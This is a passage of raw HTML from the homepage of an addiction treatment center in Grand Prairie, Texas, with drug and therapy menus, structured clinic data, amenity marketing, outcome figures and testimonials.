href="https://www.greenhousetreatment.com/alcohol-treatment/detox/">Detox from Alcohol</a></li><li class=" menu-item menu-item-type-custom menu-item-object-custom"><a href="https://Inpatient%20Alcohol%20Treatment">Inpatient Alcohol Treatment</a></li><li class=" menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.greenhousetreatment.com/alcohol-treatment/living-with-an-alcoholic/">Living with An Alcoholic</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/alcohol-treatment/binge-drinking/">Risks of Binge Drinking</a></li> </ul> </div> </li><li class=" menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/drug-addiction/">Guide to Drug Addiction</a><i class="arrow"></i></div> <div class="sub-menu-lvl2"> <ul> <li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/cocaine-treatment/">Cocaine</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/crystal-meth-addiction/">Crystal Meth</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/ecstasy/">Ecstasy</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/fentanyl-addiction/">Fentanyl</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/heroin-treatment/">Heroin</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/khat/">Khat</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/kratom/">Kratom</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/marijuana-abuse/">Marijuana</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/methadone-treatment/">Methadone Addiction</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/suboxone-treatment/">Suboxone  </a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/tramadol/">Tramadol</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/trazodone/">Trazodone Addiction</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/drug-addiction/hispanic-community-rates/">Addiction Rates in the Hispanic Community</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/veterans-and-addiction/">Veterans and Addiction</a></li> </ul> </div> </li><li class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/prescription-medication/">The Hidden Dangers of Prescription Drug Use</a><i class="arrow"></i></div> <div class="sub-menu-lvl2"> <ul> <li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/ativan-addiction-start/">Ativan</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/bath-salts/">Bath Salts</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/benzodiazepine-addiction/">Benzodiazepines</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/darvocet/">Darvocet</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/demerol/">Demerol</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/dexedrine/">Dexedrine</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/gabapentin/">Gabapentin</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/hydrocodone/">Hydrocodone</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/percocet/">Percocet</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/librium/">Librium</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/opana/">Opana</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/oxycodone-addiction/">OxyContin</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/what-is-seroquel/">Seroquel</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/xanax-treatment/">Xanax</a></li> </ul> </div> </li><li class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/">Co-Occurring Disorders</a><i class="arrow"></i></div> <div class="sub-menu-lvl2"> <ul> <li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/adhd-addiction-issues/">ADHD</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/anorexia/">Eating Disorders</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/anxiety-and-addiction/">Anxiety</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/bipolar-disorder/">Bipolar Disorder</a></li><li class=" menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/depression/">Depression</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/ptsd/">Post-Traumatic Stress Disorder</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/drug-induced-psychosis/">Psychosis</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/co-occurring-disorders/self-harm/">Self-Harm</a></li> </ul> </div> </li><li class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/therapy/">Therapy Options</a><i class="arrow"></i></div> <div class="sub-menu-lvl2"> <ul> <li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/therapy/cognitive-behavioral-therapy/">Cognitive Behavioral Therapy</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/cmt/">Contingency Management Therapy</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/therapy/dialectical-behavior-therapy/">Dialectical Behavior Therapy</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/detox/">Drug Detox</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/erp/">ERP Therapy</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/therapy/holistic-therapy/">Holistic Therapy</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/sober-living/">Post Treatment</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/rehab/">Rehab Information</a></li> </ul> </div> </li><li class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><div class="sub-menu-item"><a href="https://www.greenhousetreatment.com/texas-treatment/">Drug Treatment in Texas</a><i class="arrow"></i></div> <div class="sub-menu-lvl2"> <ul> <li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/arlington/">Arlington</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/austin/">Austin</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/corpus-christi/">Corpus Christi</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/dallas/">Dallas</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/el-paso/">El Paso</a></li><li class=" menu-item menu-item-type-custom menu-item-object-custom"><a href="https://www.greenhousetreatment.com/texas-treatment/fort-worth/">Fort Worth</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/houston/">Houston, Texas Drug and Alcohol Rehab Information</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/san-antonio/">San Antonio</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/northeast/">Northeast Texas</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/northwest/">Northwest Texas</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/southeast/">Southeast Texas</a></li><li class=" menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.greenhousetreatment.com/texas-treatment/southwest/">Southwest Texas</a></li> </ul> </div> </li></ul> </div> </div> </div> </li></ul> </nav> <!-- nav end --> <a href="https://www.greenhousetreatment.com/contact-our-addiction-treatment-center/" class="button" > <span>Get Help Now</span> </a> </div> </div> </div> </header> <!-- header end --> <main class="main"> <!-- Search Starts--> <form id='search-form' class='l-google-search__form' action='/search'> <input type='text' placeholder='Search..' name='q' class='l-google-search__input' required> <button type='submit' class='l-google-search__button'> <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 25 25"> <path fill-rule="evenodd" d="M10.7221269,5.5665771 L10.0411664,5.5665771 L9.80445969,5.80155509 C10.6406518,6.77662798 11.1492281,8.04070665 11.1492281,9.42570465 C11.1492281,12.5044309 8.6535163,15 5.57461407,15 C2.49571184,15 0,12.5044309 0,9.42570465 C0,6.34697845 2.49571184,3.8514093 5.57461407,3.8514093 C6.95969125,3.8514093 8.22298456,4.35909897 9.19811321,5.19438568 L9.4348199,4.9594077 L9.4348199,4.28020125 L13.7212693,0 L15,1.2786576 L10.7221269,5.5665771 L10.7221269,5.5665771 Z M5.57461407,5.5665771 C3.44253859,5.5665771 1.71526587,7.29375107 1.71526587,9.42570465 C1.71526587,11.5568006 3.44253859,13.2848322 5.57461407,13.2848322 C7.7058319,13.2848322 9.43396226,11.5568006 9.43396226,9.42570465 C9.43396226,7.29375107 7.7058319,5.5665771 5.57461407,5.5665771 L5.57461407,5.5665771 Z" transform="matrix(1 0 0 -1 0 20)"/> </svg> </button> </form> <!-- Search ends --> <script class="page-schema" type="application/ld+json"> { "@context": "http://www.schema.org", "@type": "MedicalClinic", "name": "GreenHouse Treatment Center", "url": "https://www.greenhousetreatment.com/", "logo": "https://www.greenhousetreatment.com/wp-content/uploads/s3:/greenhousetreatment-com-new/uploads/2018/12/Greenhouse_color-horiz.svg", "image": "https://www.greenhousetreatment.com/wp-content/uploads/2018/12/info-slider-img-01.jpg", "alternateName":"", "additionalType":["http://www.productontology.org/id/Addiction","http://www.productontology.org/id/Substance_dependence","http://www.productontology.org/id/Substance_abuse","http://www.productontology.org/id/Substance_use_disorder","http://www.productontology.org/id/Drug_rehabilitation", "http://www.productontology.org/doc/Alcohol_detoxification", "http://www.productontology.org/doc/Addiction_medicine"], "description": "The Greenhouse residential treatment facility is located in a beautiful former luxury spa in Grand Prairie Texas, near Dallas. In this peaceful atmosphere, we offer a comprehensive continuum of research-based individualized treatment for adult men and women struggling with addiction and co-occurring mental health disorders.", "telephone": "(972) 848-0221", "address": { "@type": "PostalAddress", "streetAddress": "1171 107th St", "addressLocality": "Grand Prairie", "addressRegion": "TX", "postalCode": "75050", "addressCountry": "US" }, "aggregateRating" : { "@type" : "AggregateRating", "ratingValue" : "4.0", "bestRating" : "5", "worstRating" : "1", "reviewCount" : "157" }, "openingHoursSpecification": [ { "@context": "https://schema.org", "@type": "OpeningHoursSpecification", "dayOfWeek": "Saturday", "opens": "00:01-23:59" }, { "@context": "https://schema.org", "@type": "OpeningHoursSpecification", "dayOfWeek": "Sunday", "opens": "00:01-23:59" }, { "@context": "https://schema.org", "@type": "OpeningHoursSpecification", "dayOfWeek": "Monday", "opens": "00:01-23:59" }, { "@context": "https://schema.org", "@type": "OpeningHoursSpecification", "dayOfWeek": "Tuesday", "opens": "00:01-23:59" }, { "@context": "https://schema.org", "@type": "OpeningHoursSpecification", "dayOfWeek": "Wednesday", "opens": "00:01-23:59" }, { "@context": "https://schema.org", "@type": "OpeningHoursSpecification", "dayOfWeek": "Thursday", "opens": "00:01-23:59" }, { "@context": "https://schema.org", "@type": "OpeningHoursSpecification", "dayOfWeek": "Friday", "opens": "00:01-23:59" }], "sameAs" : [ "https://www.facebook.com/GreenhouseTX/", "https://www.linkedin.com/company/american-addiction-centers/" ], "geo": { "@type": "GeoCoordinates", "latitude": "32.765751", "longitude": "-97.058874" }, "makesOffer": ["drug detox", "Alcohol Detox", "Cocaine addiction", "Heroin addiction", "Opiate addiction", "Bipolar disorder", "Alcoholism", "Club drug addiction", "Depression", "Anxiety", "PTSD"], "hasMap": "https://goo.gl/maps/Tjd66MJXvNw", "contactPoint": { "@type": "ContactPoint", "telephone": "+1 (972) 848-0221", "contactType": "Customer Service", "areaServed": ["TX", "Houston", "San Antonio", "Dallas", "Austin", "Fort Worth", "El Paso", "Arlington", "Corpus Christi", "Plano", "Laredo", "Lubbock", "Irving", "Garland", "Amarillo", "Grand Prairie", "Brownsville", "McKinney", "Frisco", "Pasadena", "Killeen", "Mesquite", "McAllen", "Waco", "Denton", "Midland", "Carrollton", "Round Rock", "Abilene", "Pearland", "Beaumont", "Odessa", "Richardson", "College Station", "Lewisville", "Tyler", "League City", "Wichita Falls", "Allen", "San Angelo", "Edinburg", "Sugar Land", "Mission", "Conroe", "Bryan", "Longview", "Pharr", "New Braunfels", "Baytown", "Flower Mound", "Cedar Park", "Temple", "Missouri City", "Georgetown", "North Richland Hills", "Mansfield", "Victoria", "Harlingen", "Pflugerville", "San Marcos", "Rowlett", "Port Arthur", "Euless", "Grapevine", "DeSoto", "Galveston", "Wylie", "Bedford", "Leander", "Cedar Hill", "Texas City", "Keller", "Little Elm", "Burleson", "Haltom City", "Rockwall", "Kyle", "The Colony", "Coppell", "Sherman", "Huntsville", "Weslaco", "Schertz", "Friendswood", "Duncanville", "Lancaster", "Hurst", "Rosenberg", "Texarkana", "Farmers Branch", "San Juan", "Del Rio", "Lufkin", "La Porte", "Waxahachie", "Socorro", "Deer Park", "Nacogdoches", "Copperas Cove", "Southlake", "Harker Heights", "Weatherford", "Cleburne", "Cibolo", "Seguin", "Eagle Pass", "Big Spring", "Lake Jackson", "Greenville", "Colleyville", "Alvin", "Sachse", "Kingsville", "Hutto", "Balch Springs", "Midlothian", "University Park"] } } </script> <section class="intro-section"> <div class="intro" style="background-image: url('https://www.greenhousetreatment.com/wp-content/uploads/2019/03/GH_Sizzle.jpg')"> <div class="intro-video"> <video autoplay loop muted> <source src="https://www.greenhousetreatment.com/wp-content/uploads/2019/01/GH_Sizzle_101_720.webm" type="video/webm"> </video> </div> <div class="cell"> <div class="container"> <div class="holder"> <h2 class="holder-title">Your Recovery Begins Here</h2> <h1 class="holder-subtitle">Your New Life Awaits at Our Premier Drug Treatment Center in Texas</h1> </div> </div> </div> <div class="logos"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2019/04/CARF_GoldSeal-300x300.png" alt=""> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/logo-02.png" alt="BBB"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/logo-03.png" alt="NABH"> </div> </div> <div class="info-blocks home"> <div class="container"> <div class="info-blocks-inner"> <ul> <li> <div class="info-block"> <h5>Tailored Treatment</h5> <p>Our rehab center in Dallas provides many levels of care, customizing your treatment along the way. </p> <div class="more"> <a href="https://www.greenhousetreatment.com/addiction-treatment-services-dallas/levels-of-care/" > Learn more </a> </div> </div> </li> <li> <div class="info-block"> <h5>Ready for a Change? </h5> <p>Are you ready to take your first step? We're here to help you at every step! </p> <div class="more"> <a href="https://www.greenhousetreatment.com/admissions/" > Learn more </a> </div> </div> </li> </ul> </div> </div> </div> </section> <div class="treatments"> <div class="container"> <div class="treatments-inner"> <svg class="circles" xmlns:xlink="http://www.w3.org/1999/xlink" width="972" height="984" viewBox="0 0 972 984"> <defs> <path id="x7iya" d="M329.64 1201.3c0-219.633 178.047-397.68 397.68-397.68S1125 981.667 1125 1201.3s-178.047 397.68-397.68 397.68-397.68-178.047-397.68-397.68z"/> <path id="x7iyb" d="M329.64 1087.53c0-219.633 178.047-397.68 397.68-397.68S1125 867.897 1125 1087.53s-178.047 397.68-397.68 397.68-397.68-178.047-397.68-397.68z"/> <path id="x7iyc" d="M155 1201.3c0-219.633 178.047-397.68 397.68-397.68s397.68 178.047 397.68 397.68-178.047 397.68-397.68 397.68S155 1420.933 155 1201.3z"/> <path id="x7iyd" d="M155 1087.53c0-219.633 178.047-397.68 397.68-397.68s397.68 178.047 397.68 397.68-178.047 397.68-397.68 397.68S155 1307.163 155 1087.53z"/> <path id="x7iye" d="M241.82 1014.68C241.82 795.047 419.867 617 639.5 617s397.68 178.047 397.68 397.68-178.047 397.68-397.68 397.68-397.68-178.047-397.68-397.68z"/> </defs> <g> <g transform="translate(-154 -616)"> <g opacity=".15"> <use fill="#fff" fill-opacity="0" stroke="#12231d" stroke-miterlimit="50" xlink:href="#x7iya"/> </g> <g opacity=".15"> <use fill="#fff" fill-opacity="0" stroke="#12231d" stroke-miterlimit="50" xlink:href="#x7iyb"/> </g> <g opacity=".15"> <use fill="#fff" fill-opacity="0" stroke="#12231d" stroke-miterlimit="50" xlink:href="#x7iyc"/> </g> <g opacity=".15"> <use fill="#fff" fill-opacity="0" stroke="#12231d" stroke-miterlimit="50" xlink:href="#x7iyd"/> </g> <g opacity=".15"> <use fill="#fff" fill-opacity="0" stroke="#12231d" stroke-miterlimit="50" xlink:href="#x7iye"/> </g> </g> </g> </svg> <div class="treatments-info"> <h2>What We Treat</h2> <p>By treating the whole person, our purpose and passion is to empower individuals, their families, and communities through the quiet healing and promotion of optimal wellness of mind, body, and spirit.</p> </div> <ul> <li> <a href="https://www.greenhousetreatment.com/therapy/cognitive-behavioral-therapy/" > Cognitive Behavioral Therapy </a> </li> <li> <a href="https://www.greenhousetreatment.com/cmt/" > Contingency Management Therapy </a> </li> <li> <a href="https://www.greenhousetreatment.com/therapy/dbt/" > Dialectical Behavior Therapy </a> </li> <li> <a href="https://www.greenhousetreatment.com/detox/" > Drug Detox </a> </li> <li> <a href="https://www.greenhousetreatment.com/erp/" > ERP Therapy </a> </li> <li> <a href="https://www.greenhousetreatment.com/therapy/holistic-therapy/" > Holistic Therapy </a> </li> <li> <a href="https://www.greenhousetreatment.com/addiction-treatment-services-dallas/aftercare/" > Post Treatment </a> </li> <li> <a href="https://www.greenhousetreatment.com/alcohol-treatment/detox/" > Detox from Alcohol </a> </li> </ul> <a href="https://www.greenhousetreatment.com/addiction-recovery-program-overview/" class="button has-arrow" > <span>Treatment Programs</span> </a> </div> </div> </div> <div class="garantee-wrap"> <div class="container"> <div class="garantee"> <div class="badge"> <strong>90</strong> <span>Day Promise</span> </div> <div class="text"> If you successfully complete our 90-day program, we guarantee you’ll stay clean and sober, or you can return for a complimentary 30 days of treatment. <p class="guarantee-inner-text">* Results may vary, and terms and conditions may apply. For more information, visit us <a href="https://americanaddictioncenters.org/90-day-promise"> here</a></p> </div> </div> </div> </div> <section class="wrap-proven-results"> <div class="proven-results"> <div class="bg-block"> <i style="background-image:url('https://www.greenhousetreatment.com/wp-content/uploads/2018/12/bg-02-1920x800.jpg');"></i> </div> <div class="container"> <h2>Proven Results</h2> <div class="proven-results-carousel slider-has-dots"> <div class="reduction"> <div class="round"> <div class="round-inner"> <div data-value="44"> <div class="odometer"></div> <em>%</em></div> <span>reduction</span> </div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 203 203"> <circle stroke-dasharray='1000' stroke-dashoffset='1000' cx="101.5" cy="101.5" r="100"/> </svg> </div> <p>in days experiencing physical health problems</p> </div> <div class="reduction"> <div class="round"> <div class="round-inner"> <div data-value="56"> <div class="odometer"></div> <em>%</em></div> <span>reduction</span> </div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 203 203"> <circle stroke-dasharray='1000' stroke-dashoffset='1000' cx="101.5" cy="101.5" r="100"/> </svg> </div> <p>in days experiencing mental health problems</p> </div> <div class="reduction"> <div class="round"> <div class="round-inner"> <div data-value="94"> <div class="odometer"></div> <em>%</em></div> <span>reduction</span> </div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 203 203"> <circle stroke-dasharray='1000' stroke-dashoffset='1000' cx="101.5" cy="101.5" r="100"/> </svg> </div> <p>in total days with significant family conflict</p> </div> <div class="reduction"> <div class="round"> <div class="round-inner"> <div data-value="63"> <div class="odometer"></div> <em>%</em></div> <span>of clients</span> </div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 203 203"> <circle stroke-dasharray='1000' stroke-dashoffset='1000' cx="101.5" cy="101.5" r="100"/> </svg> </div> <p>were abstinent from all substances at 12 months</p> </div> </div> <div class="outcome-study-text"> <p>Read our <a href="https://americanaddictioncenters.org/outcomes-study">patient outcomes study </a> to learn more about treatment results.</p> <p>(The 3-year study reflects patient outcomes across the American Addiction Centers network.)</p> </div> </div> </div> <div class="proven-results-testimonials"> <div class="container"> <ul> <li> <blockquote class="testimonial"> <q>I had an extremely comfortable stay while dealing with an extremely uncomfortable problem, my addiction. The education and care I received far exceeded my expectations. I feel prepared and ready to restart my life.</q> <cite>Tracey, Greenhouse Alum</cite> </blockquote> </li> <li> <blockquote class="testimonial"> <q>This place is amazing. From the therapists, to the food, to the classes, and all the amenities at the Greenhouse.</q> <cite>Casey, Greenhouse Alum</cite> </blockquote> </li> </ul> </div> </div> </section> <!-- phone-section --> <section class="phone-section "> <div class="phone-section-pattern"></div> <div class="container"> <p>At Greenhouse, you’ll receive the highest quality medical care combined with the latest in evidence-based drug and alcohol addiction treatment. Greenhouse gives you a head start at recovery, while also making your time in treatment a comfortable one. Located in a former Neiman Marcus spa, Greenhouse offers a luxurious and beautiful environment with amenities that you won’t find in other inpatient treatment programs, ranging from gourmet, nutritious meals prepared by our executive chef to an indoor pool and jacuzzi. </p> <p>Our multidisciplinary team of doctors, therapists, social workers, and more work with you at every step to ensure your treatment is meeting your unique needs and making any adjustments necessary. We also begin helping you to create an aftercare plan from the moment you begin your treatment so that your recovery journey doesn’t end when you leave our program.</p> <!-- phone-block --> <div class="phone-block "> <a href="tel:9728480221"> <b>(972) 848-0221</b> <i> <img src="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/dist/images/icon-phone.svg" alt=""> </i> </a> </div> <!-- phone-block end --> </div> </section> <!-- phone-section end --> <section class="wrap-info-slider"> <div class="container"> <div class="holder-info-slider"> <div class="info-slider slider-has-dots"> <div class="info-slider-item"> <i style="background-image:url('https://www.greenhousetreatment.com/wp-content/uploads/2018/12/info-slider-img-01.jpg');"></i> <div class="info-slider-info"> <div class="short-info"> <p>A former luxury spa retreat in Dallas, Texas, the Greenhouse provides all levels of care to adults struggling with substance abuse and mental health issues.</p> <div class="more"> <a href="https://www.greenhousetreatment.com/dallas-addiction-treatment-facility/" > Explore Facility </a> </div> </div> </div> </div> <div class="info-slider-item"> <i style="background-image:url('https://www.greenhousetreatment.com/wp-content/uploads/2018/12/8-Bedroom-1-min-1620x1080.jpg');"></i> <div class="info-slider-info"> <div class="short-info"> <h4>Housekeeping Services</h4> <p>We know that engaging in addiction recovery while addressing co-occurring mental health disorders can be demanding, requiring a strong focus. To help you concentrate on treatment, we provide housekeeping of residential rooms and common areas.</p> <div class="more"> <a href="https://www.greenhousetreatment.com/dallas-addiction-treatment-facility/" > Explore Facility </a> </div> </div> </div> </div> <div class="info-slider-item"> <i style="background-image:url('https://www.greenhousetreatment.com/wp-content/uploads/2018/12/dining.jpg');"></i> <div class="info-slider-info"> <div class="short-info"> <h4>Gourmet Meals</h4> <p>Greenhouse dining staff provides our clients with delicious, healthy meals prepared and served by friendly, talented chefs in a warm dining area environment.</p> <div class="more"> <a href="https://www.greenhousetreatment.com/dallas-addiction-treatment-facility/" > Explore Facility </a> </div> </div> </div> </div> <div class="info-slider-item"> <i style="background-image:url('https://www.greenhousetreatment.com/wp-content/uploads/2018/12/Gym.jpg');"></i> <div class="info-slider-info"> <div class="short-info"> <h4>Indoor Gym Facilities & Pool</h4> <p>Greenhouse encourages whole body wellness and physical activity for clients at all fitness levels. Our facility offers an indoor swimming pool, gym facilities, and exercise equipment that benefits the client’s cardio, strength, and flexibility.</p> <div class="more"> <a href="https://www.greenhousetreatment.com/dallas-addiction-treatment-facility/" > Explore Facility </a> </div> </div> </div> </div> <div class="info-slider-item"> <i style="background-image:url('https://www.greenhousetreatment.com/wp-content/uploads/2018/12/3b-Pool-min-1620x1080.jpg');"></i> <div class="info-slider-info"> <div class="short-info"> <h4>Spa Services</h4> <p>Greenhouse offers the client opportunities to relax during the program stay, including spa services and other amenities. Current services include massage treatment, whirlpool, and yoga classes.<br /> Additional services, not included in the treatment programs, are available by appointment for a fee.</p> <div class="more"> <a href="https://www.greenhousetreatment.com/dallas-addiction-treatment-facility/" > Explore Facility </a> </div> </div> </div> </div> </div> <div class="wrap-slider-nav"> <div class="slider-nav"></div> </div> </div> </div> </section> <section class="info-blocks home"> <div class="container"> <div class="info-blocks-inner"> <ul> <li> <div class="info-block"> <div class="wrap-icon"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/icon-01.svg" alt="1-on-1 consultation and insurance verification are 100% free"> </div> <h4>Free</h4> <p>Your 1-on-1 consultation and insurance verification are 100% free.</p> </div> </li> <li> <div class="info-block"> <div class="wrap-icon"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/icon-02.svg" alt="Call or chat now"> </div> <h4>Easy</h4> <p>All you have to do is pick up the phone and call or chat now.</p> </div> </li> <li> <div class="info-block"> <div class="wrap-icon"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/icon-03.svg" alt="100% Confidential"> </div> <h4>Confidential</h4> <p>We will never share your information with a third party without your explicit consent.</p> </div> </li> </ul> </div> </div> </section> <!-- phone-section --> <section class="phone-section "> <div class="phone-section-bg"> <i style="background-image: url('https://www.greenhousetreatment.com/wp-content/uploads/2018/12/bg-01-1920x720.jpg');"></i></div> <div class="container"> <h2>You Can Start a New Life</h2> <p>Contact us today to talk with a Admission Navigator who will give you the information you need to make the right decision for you and your loved ones.</p> <!-- phone-block --> <div class="phone-block "> <a href="tel:9728480221"> <b>(972) 848-0221</b> <i> <img src="https://www.greenhousetreatment.com/wp-content/themes/greenhouse-bigdrop/slice/dist/images/icon-phone.svg" alt=""> </i> </a> </div> <!-- phone-block end --> </div> </section> <!-- phone-section end --> </main> <!-- footer --> <footer class="footer"> <div class="footer-top"> <div class="container"> <div class="footer-top-inner"> <div class="footer-logo"> <a href="https://www.greenhousetreatment.com"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/logo-footer.svg" alt="an AAC Facility"> </a> </div> <div class="footer-address"> <h4>Address of Facility</h4> <address>Greenhouse Treatment Center<br /> 1171 107th St<br /> Grand Prairie, TX 75050</address> <div class="more small"> <a href="https://www.google.com/maps/place/Greenhouse+Addiction+Treatment+Center/@32.7645886,-97.0611557,17z/data=!4m5!3m4!1s0x864e87184b66e4ab:0xefab6f4fe082e0cc!8m2!3d32.7645782!4d-97.0589815" target="_blank" rel="nofollow" title="Opens in a new window" > Get Directions </a> </div> </div> <div class="footer-nav"> <div class="footer-nav-col"><ul class="footer-column-list"><li><a href="https://www.greenhousetreatment.com/brand-promise-details/">Brand Promise Details</a></li><li><a href="https://www.greenhousetreatment.com/hippa-policy/">Notice of Privacy Practices</a></li><li><a href="https://americanaddictioncenters.org/reviews">Links to Reviews</a></li></ul></div><div class="footer-nav-col"><ul class="footer-column-list"><li><a href="https://www.greenhousetreatment.com/privacy-policy/">Privacy Policy</a></li><li><a href="https://www.greenhousetreatment.com/terms-of-use/">Terms of Use</a></li></ul></div><div class="footer-nav-col"><ul class="footer-column-list"><li><a href="http://careers.americanaddictioncenters.org/">Careers</a></li><li><a href="/sitemap_index.xml">Site Map</a></li></ul></div> </div> <!-- social --> <div class="social"> <ul> <li> <a href="https://twitter.com/GreenhouseAAC" target="_blank" rel="nofollow"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/icon-twitter.svg" alt="Twitter"> </a> </li> <li> <a href="https://www.facebook.com/GreenhouseTX/" target="_blank" rel="nofollow"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/icon-facebook.svg" alt="Facebook"> </a> </li> <li> <a href="https://www.linkedin.com/company/greenhouse-treatment-center-llc" target="_blank" rel="nofollow"> <img src="https://www.greenhousetreatment.com/wp-content/uploads/2018/12/icon-linkedin.svg" alt="LinkedIn"> </a> </li> </ul> </div> <!-- social --> </div> </div> </div> <div class="footer-bottom"> <div class="container"> <p>&copy; 2019 American Addiction Centers. All rights reserved.<br /> Various trademarks held by their respective owners.</p> </div> </div> </footer> <!-- footer end --> <script type="text/javascript"> lsv = 'WEB-GH-MAIN'; </script> <script type='text/javascript' 